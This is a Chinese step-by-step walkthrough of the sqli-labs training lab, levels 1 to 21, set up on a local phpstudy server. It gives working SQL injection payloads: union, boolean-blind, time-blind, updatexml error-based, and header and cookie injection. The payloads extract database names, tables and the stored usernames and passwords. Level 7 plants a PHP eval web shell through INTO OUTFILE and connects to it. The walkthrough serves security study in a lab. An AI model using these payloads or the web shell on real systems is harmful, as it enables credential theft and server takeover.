准备阶段
前面需要准备打开phpstudy
我这里是老版:phpstudy
若3306端口被占用,win+r,cmd,命令行提示符里输入
netstat -ano | findstr xxxx //xxxx为查询的端口号,找到pid,在任务管理器界面,选择对应的pid,详细信息结束进程
同时需要再网页上打开http://127.0.0.1/sqli-labs/
跳转到如下界面:
配置成功。
Less-1
判断注入类型
尝试注入个单引号闭合,网页回显 MySql 报错,说明存在注入漏洞。
?id=1'
通过''1'' LIMIT 0,1' at line 1可以看出我们添加的 ' 起到了一个闭合的作用,显示出了闭合的 1 ,然后面我们就可以添加语句进行注入,此处是字符型注入。
将我们所加的 ' 后面注释掉,可以回显正确的网页
闭合方式:?id=1' --+![](https://img-blog.csdnimg.cn/direct/c2ae57ef67804d8b8c72d467f74cda22.png)
获取数据库信息
接下来判断表有几列,使用 ORDER BY 子句进行一个排序,看一下对几列有效。
?id=1' ORDER BY 8--+
使用二重法,依次尝试,最终确定为3列 ?id=1' ORDER BY 3--+
接下来判断哪些列是我们能用的,首先令 id 参数的查询不到结果,然后使用 UNION 进行组合查询。网页回显了数字 2 和 3,说明第 2 列和第 3 列是我们可用的。
?id=-99' UNION SELECT 1,2,3--+
接下来开始爆数据库名,我们选择第 2 个位置作为显示位。database() 函数可以回显当前使用的数据库,我们将对它进行查询。
?id=99' UNION SELECT 1,database(),3 --+
接下来开始爆表名,在 information_schema.table 进行查询,使用 group_concat() 函数合并查询结果。
?id=-99' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema='security'--+
接下来爆 users 表的字段,在 information_schema.columns 爆出来
?id=-99' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+
获取目标信息
接下来我们爆出 users 表中的信息,这个表有用户名和密码这种敏感信息。
?id=-99' union select 1,group_concat(concat_ws(';',username,password)),3 from security.users--+
Less-2
判断注入类型
先注入正常参数,网页回显正常的信息
闭合方式:?id=1
![](https://img-blog.csdnimg.cn/direct/682d4ed6bb774d64bdf50b12bb7adcb6.png)
尝试注入单引号闭合,网页回显 MySQL 报错,说明存在注入漏洞
?id=1'
加个注释,将后端的 SQL 语句后面的内容注释后,网页仍然不能回显正确的信息。即我们注入的单引号没有起到闭合的作用。得出结论:这是一个数字型注入。
数字型注入和字符型注入的区别在于我们不需要用单引号去闭合,其他操作基本相同
获取数据库信息
判断表有几列,使用 ORDER BY 子句进行排序,看对几列有效
?id=1 order by 3--+ 有效
?id=1 order by 4--+ 无效
结果就是有三列可用
接下来判断哪些列是我们能用的,令 id 参数的查询不到结果,然后是同 UNION 进行组合查询。网页回显了数字 2 和 3,说明第二列和第三列是我们可以用的
?id=-90 union select 1,2,3 --+
爆破数据库名
?id=99 union select 1,database(),3 --+
爆破表名
?id=-99 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
获取目标信息
爆破users表的字段
?id=-99 union select 1,group_concat(concat_ws(';',username,password)),3 from security.users--+
Less-3
判断是否存在注入点
先注入正常参数,网页回显正常的信息
?id=1
尝试单引号闭合,网页回显 MySQL 语句报错,说明存在注入漏洞,
?id=1'
根据报错信息,我们需要一个括号开闭合,其他操作与前两题相同,为字符型
闭合方式:?id=1') --+![](https://img-blog.csdnimg.cn/direct/3fd3d6dc7cc24101bcf1334a5276e7d9.png)
获取数据库信息
其余查询与前面第一关整体一样,只是闭合方式不同
Less-4
判断闭合方式
先注入正常参数,网页回显正常的信息
?id=1
?id=1' 网页也回显正常的信息
尝试注入双引号闭合,MySQL 语句报错,说明存在注入漏洞,并且闭合符号是双引号+括号
加上--+,注释掉后面的 SQL 语句
闭合方式:?id = 1 ") --+
获取数据库信息与除了闭合方式不同,其余均与第一关相同。
Less-5
判断闭合方式
先输入正确的参数,页面返回“You are in ... ”,但是没有其他信息
?id=1接下来注入个查不到的参数,页面没有任何反应。说明向这个网页传入参数是用于判断 id 值是否存在,如果存在则返回信息。由于网页仅返回或不存在,因为我们可以使用 bool 注入(布尔注入)
?id = -1判断是否有 SQL 注入漏洞,注入个单引号进行闭合,网页返回报错信息。
这说明网页存在 SQL 注入漏洞,并且用单引号字符型注入,
正确的信息回显 you are in... 错误的信息报错或无回显
闭合方式:?id=1'
加上--+,注释掉后面的 SQL 语句
获取数据库信息
接下来判断表有几列,使用 ORDER BY 子句进行一个排序,看一下对几列有效。
?id=1' orderby 3--+ you are in ...
?id=1' order by 4--+ 报错信息即存在三列信息
使用 length() 函数结合回显信息判断数据库长度,多次尝试测试长度为8
?id=1' and length((select database())=8 --+
获取数据库名,此处不适用 UNION 联合查询(因为当 id 为一个查不到的参数时,页面无显示。即因为是布尔注入)。我们使用 left() 函数,left(string, num) 函数返回字符串 string 最左边的 num 个字符串。
我们首先使用 left() 函数判断数据库名的第一位是否是字符 a。注入之后无回显,说明数据库名第一位不是 a
?id = 1' and left((select database()),1)='a' --+经过多次测试,第一位为s
?id = 1' and left((select database()),1)='a' --+
从a到z慢慢试最后得到
?id=1' AND LEFT((SELECT database()), 8)='security' --+
Less-6
判断闭合方式
首先注入正确的参数,页面返回“You are in ...”,但是没有其他信息
?id=1
接下来注入个查不到的参数,网页没有任何反应。说明向这个网页传入参数是用于判断 id 值是否存在,如果存在则返回信息。由于网页仅返回存在或不存在,因此我们可以使用 bool 注入。
?id=999999判断是否有 Sql 注入漏洞,注入个单引号进行闭合,网页返回 “You are in...”。
?id=1'注入个双引号进行闭合,网页返回错误。这说明网页存在 Sql 注入漏洞,并且是用双引号字符型注入。
闭合方式:?id=1"![](https://img-blog.csdnimg.cn/direct/0ac4ebe6b900425dbe4d17146dc3648a.png)
获取数据库信息
其余查询与前面第五关整体一样,只是闭合方式不同
Less-7
通过sql注入,写入一个木马文件
开启文件读取权限
MySQL 使用 secure-file-priv 参数对文件读写进行限制,当参数值为 null 时无法进行文件导出操作。使用这条命令可以查看
通过修改 MySQL 下的 my.ini 配置文件就可以启用权限,需要把下面这个字符串写入文件中。
secure_file_priv="/"
将phpsty重启,在数据库中再次查看
判断闭合方式
注入个正常的参数,网页返回“You are in.... Use outfile......”。
闭合方式:?id=1
注入单引号和单引号加个括号闭合,网页回显错误信息。
?id=1'
?id=1')
?id=1'))
写入文件
我们需要先知道网页所在的文件路径,从该题中的无法得到的,我们去 Less-1 题,在那获取文件路径。这种操作也可以应用在实践中,可以同时利用同一 Web 中的多个注入点。使用 UNION 联合查询来注入参数,使用 into outfile 在网页目录下入一句话木马。注意此处存在转义问题,所有的“\”都要双写
?id=1' UNION SELECT 1,2,'<?php @eval($_POST["123456"]);?>' into outfile "D:\\phpStudy\\WWW\\sqli-labs\\Less-7\\text.php"--+
查看文件夹
使用蚁剑连接,记得 url 要加上我们传入的 text.php。点击添加,双击所添加的出现以下界面,即成功:
Less-8
判断闭合方式
首先注入正确的参数,网页返回 “You are in...”,但是没有其他信息。
?id=1
然后注入一个查不到的参数,网页没有任何反应。说明向这个网页传入参数是用于判断 id 值是否存在,如果存在则返回信息
?id=9999
判断是否有 SQL 注入漏洞,注入个单引号进行闭合,网页无任何返回
?id=1'
此时还是注入单引号,但是后面注释掉,网页返回“You are in ...”。
这说明网页存在 SQL 注入漏洞,并且是用单引号字符型注入。同时因为 SQL 语句发生错误,因此此处是 bool 盲注漏洞
闭合方式:?id=1'--+![](https://img-blog.csdnimg.cn/direct/395a9c99a73c4a299dfee9304d2201cf.png)
获取数据库信息与第五关类似,只是闭合方式不同,报错时不显示报错信息
Less-9
判断闭合方式
首先注入正确的参数,网页返回 “You are in...”,但是没有其他信息。
首先注入正确的参数,网页返回“You are in ...”,但是没有其他信息
?id=1
接下来注入个查不到的参数,网页还是返回“You are in ...” ?id=9999
注入个单引号进行闭合,网页还是返回“You are in ...” ?id=1'
再尝试下面三种方式:网页仍然是“You are in ...”
?id=1' --+
?id=1"
?id=1" --+
我们转换思路,MySQL 的 sleep() 函数能够起到休眠的作用。为了方便调试,我们使用 Burp 拦截工具中的重放器
?id=1 and sleep(1) --+ 使用 Burp 工具开启拦截,并注入,发送都重放器,发送并观察时间
然后在网页中再次尝试
明显响应时间变长,这是明显的基于 时间盲注 的字符型 SQL 注入漏洞,我们需要使用 sleep() 函数制造时间差来进行注入。有时间延迟说明注入的
闭合方式:id = 1' and sleep(10) --+
获取数据库信息
注入流程与 Less-5 类似,不过这里的判断标准不是回显的信息,而是响应时间。MySQL 的 IF 语句允许根据表达式的某个条件或结果来执行一组 SQL 语句,语法如下,当表达式 expr 为真时返回 value1 的值,否则返回 value2
if(expr,value1,value2)
通过二分法测试,最终确定数据库长度为 8
?id=1' and if(length(database())=8,sleep(10),1) --+
使用穷举法进行测试,得到数据库名的第一个字符为 "s"
?id=1' and if(left((select database()),1)='s' ,sleep(10),1) --+
最终得到数据库名字为“security”
均通过响应时间来确定
接下来使用类似的方法,爆出表明、字段名和其他信息
Less-10
判断闭合方式
与第9关类似,属于通过时间盲注,只是闭合方式不同
闭合方式:id=1" and sleep(10) --+
获取数据库信息与第9关闭合方式不同,其余一样
Less-11
判断闭合方式
我们首先尝试下这个网页的正常用法,输入一个正确的用户名和密码试试,网页显示登陆成功。
Username : admin
Password : admin接下来直接在 “Username” 中直接注入单引号,网页返回报错信息,说明存在 Sql 注入。
注入万能密码试试,用户名随便写点东西,使用 OR 运算符构造恒真条件,使用 “#” 注释掉后面的内容注入。网页提示我们注入成功,由于此处使用的是单引号闭合,因此这里是字符型注入。
闭合方式: ' OR 1 = 1#![](https://img-blog.csdnimg.cn/direct/6b19548fdcb54595aef6a58142a2b361.png)
获取数据库信息
判断表有几列,使用 ORDER BY 子句进行排序看下对几列有效
username: ' or 1=1 order by 3 # 报错
username: ' or 1=1 order by 2 # 有效
说明存在两列
爆数据库名,首先注入错误的用户名和密码,使其找不到数据。
使用 UNION 进行联合查询,查询成功把数据库名接到网页回显的地方。
' UNION SELECT database(),1#爆破表名:' union select 1,group_concat(table_name) from information_schema.tables where table_schema ='security' #
爆破字段名:' union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' #
爆破账号密码:' union select 1,group_concat(concat_ws(';',username,password)) from security.users #
Less-12
判断闭合方式
用户名随便写点东西后用单引号闭合,使用 OR 运算符构造恒真条件,使用 “#” 注释掉后面的内容注入。网页提示登录失败,并且没有返回报错信息,说明不是用单引号闭合。
a' or1 = 1#
注入以下的内容,统统都显示登录失败且无回显。
a') or 1 = 1#
a')) or 1 = 1#
使用双引号闭合,出现报错,
a " or 1=1
通过报错信息发现需要双引号和括号进行闭合,所以
闭合方式:a " )or 1=1 #
获取数据库信息与第11关整体相同,只是闭合方式不同
Less-13
判断闭合方式
先使用 ' 单引号闭合,发现报错信息
通过报错信息可知,我们需要一个单号号和一个括号进行闭合,所以
闭合方式:' ) or 1=1 #![](https://img-blog.csdnimg.cn/direct/9dd3957698cf4e109f11d1086fa64c2b.png)
但是成功后没有回显信息,成功显示蓝色信息,失败显示红色信息
获取数据库信息
使用 length() 函数结合回显信息判断数据库长度,经过测试数据库的长度为8
') or 1=1 or length((select database()))=8#使用 left(string,num) 函数返回字符串 string 最左边的 num 个字符。首先使用判断数据库名的第一位是否是字符 a,依次尝试a-z,最终得出的结果为s
') or 1=1 or left((select database()),1)='s'#使用同样的方法继续爆破表名、字段名及其剩余信息。
Less-14
判断闭合方式
先使用 ' 单引号闭合,显示网页登陆失败但是没有报错信息
在使用" 双引号闭合,出现报错信息通过报错信息可知,需要一个双引号进行闭合,所以
闭合方式:" or 1=1 #![](https://img-blog.csdnimg.cn/direct/33fd94c1a8144c209fc5a485d95687b5.png)
获取数据库信息与第13关整体相同只是闭合方式不同
Less-15
判断闭合方式
先使用单引号注入,发现显示登陆失败,但是没有报错信息
以此使用双引号,加括号的方式,均没有报错信息
当你依次注入完整的注入信息是,发现 ' or 1=1 # 是成功登陆界面,在此登陆界面只能通过成功与失败进行,可用使用 bool 盲注或者时间盲注都行。
闭合方式:' OR 1 = 1#
获取数据库信息,我们使用布尔盲注的话,和前面第5关类似,只是字段判断出来是两列,闭合方式不同,其余流程相同;使用时间盲注的话和前面第9关类型,闭合方式不同,其余流程大体相同
Less-16
判断闭合方式
使用15关的思路,与15关大同小异,只是闭合方式不同,通过测试发现
闭合方式:") OR 1 = 1#
获取数据库信息和15关闭合方式不同,其余流程相同
Less-17
本关卡有两个 SQL 语句,其中一个进行了强效的过滤,我们需要发现第二个注入点。同时本关卡可以使用 报错注入 进行攻击
判断闭合方式
我们先按照网页的功能走一遍,目测是更改密码的页面,输入用户名之后用新密码覆盖旧密码
去第11关尝试,发现登陆成功,说明密码修改完成
使用单引号闭合构造恒真条件,网页回显密码修改失败。
a' OR 1 = 1#
测试一下所有的注入,发现这些注入网页都回显改密失败。
a') OR 1 = 1#
a')) OR 1 = 1#
a" OR 1 = 1# a") OR 1 = 1#
a")) OR 1 = 1#
我们切换下思路,之前我们的用户名字段都是空字符,现在我们写上一个已知的用户名 admin 再次注入。
uname=admin
passwd=' 出现报错信息
闭合方式:
uname=admin
passwd=' or 1=1 #
网页回显改密码成功,并且报了一个语法错误,说明 passwd 使用单引号进行闭合。同时我们可以推测这个关卡有 2 次查询,第一次是根据 uname 参数进行查询,判断要改密码的用户是否存在。第二次查询时根据要改密码的用户,把 passwd 参数覆盖原密码,这里在第二次查询有注入点。
updatexml() 报错注入
我们将使用 updatexml() 报错注入,该函数用于改变 XML 文档中符合条件的节点的值。函数原型为:
UPDATEXML (XML_document, XPath_string, new_value);
参数 | 说明 |
---|---|
XML_document | String,XML 文档对象的名称 |
XPath_string | Xpath 格式的字符串 |
new_value | String,用于替换查找到的符合条件的数据 |
其中参数 XPath_string 需要是“/xxx/xxx/...”的格式,进行查询时将会按照这个参数进行操作。注意:如果 XPath_string 是一个错误的路径,但是该路径符合参数规范,就不会报错。反之,参数不符合规范,则会触发报错,我们就是利用这个,通过 updatexml() 函数的报错回显我们需要的信息。
获取数据库信息
利用 updatexml() 函数获取下当前使用的 MySQL版本
' OR updatexml(1,concat("!",version()),2)#
获取数据库名:
uname=admin
password=' OR updatexml(1,concat("!",version()),2)#爆破表名:
uname=admin
passwd=' OR updatexml(1,concat("!",(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'security')),2)#爆破字段名:
uname=admin
password=' OR updatexml(1,concat("!",(SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema = 'security' AND table_name = 'users')),2) or'
爆破账号密码:
uname=admin
Less-18
判断闭合方式
首先我们注入正确的用户名和密码,观察到网页回显了 IP Address 和 User Agent。用户代理 User Agent 是一个 HTTP 头,使得服务器能够识别客户使用的操作系统及版本、CPU 类型、浏览器及版本、浏览器渲染引擎、浏览器语言、浏览器插件等。
接下来注入个错误的用户名和密码,网页显示登录失败且仅回显了 IP Address。
Username:admin
Password:a依次使用引号,双引号,括号的方式闭合,发现均为上面图片的报错信息
注意到登录成功时,User Agent 会被回显到网页上,我们考虑 User Agent 头可能会存在注入
使用 brup 抓包
Ctrl +R 发送到 Repeater修改 User-Agent 字段,添加一个引号,发现报错信息,说明此处存在注入点
闭合方式:User-Agent:' '
获取数据库信息
在注入的两个单引号之间可以插入其他 Sql 语句,我们在这里放置 updatexml() 报错注入语句。注意使用单引号闭合两侧的 Sql 语句时,相当于把它分割成了 2 部分,插入 updatexml() 报错时要用 OR 进行连接。
爆破数据库:
' OR updatexml(1,concat("!",database()),2)or '爆破表名:
' OR updatexml(1,concat("!",(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'security')),2) or'
爆破字段名:
' OR updatexml(1,concat("!",(SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema = 'security' AND table_name = 'users')),2) or'
Less-19
判断闭合方式
整体思路与第18关一样,只是闭合方式和注入点不同,在输入正确的账号和密码时,Referer显示回页面,所以我们判断它为注入点
闭合方式:Referer:''
获取数据库信息整体与第18关相同,注入点不用
Less-20
判断闭合方式
首先随便输入正确的用户名和密码进行登录,观察到网页回显了大量信息。再次刷新,Less 20 的页面没有变化,这应该是 cookie 起到的作用。cookie 是网站为了辨别用户身份,进行 Session 跟踪而储存在用户本地终端上的数据。想要回到登录页面,我们需要先把 cookie 清除掉。
依次使用引号,双引号,括号的方式闭合,发现均为以下图片的报错信息
为了发现注入点,我们抓包看看,首先抓登录网页发的包
发现有一个在网页所看到的
根据 Cookie 的作用和原理,网页在用户登录后,会利用浏览器记录用户的登录状态,在用户刷新、重新登录或进入其他相关页面时,不需要再次登录。
我们猜测,Cookie是一个注入点
我们在此次使用单引号闭合发现报错信息,说明处为注入点
根据报错信息我们确定闭合方式
闭合方式:Cookie:uname=' '
获取数据库信息整体与第18关相同,注入点不用
Less-21
判断闭合方式
首先随便输入正确的用户名和密码进行登录,观察到网页回显了大量信息,与第20关网页相同利用相同的方法,我们发现此次还是Cookie作为注入点,但是闭合方式不同
闭合方式:Cookie:uname=') '
当我们想要获取数据库时发现,此次的注入点信息不是我们能够看懂的信息
通过转换我们发现此次使用的是base64编码,我们需要将我们所需要的命令优先转换为base64编码在进行发生,例如我们爆破数据库
' union select 1,database(),3# 我们需要将这个命令转换,在这个工具里面自动转换,也可以在网上转换后进行替换转换完成后进行发送,得到我们需要的
其余的爆破均使用该方法,其余命令与第18关相同,注入点不同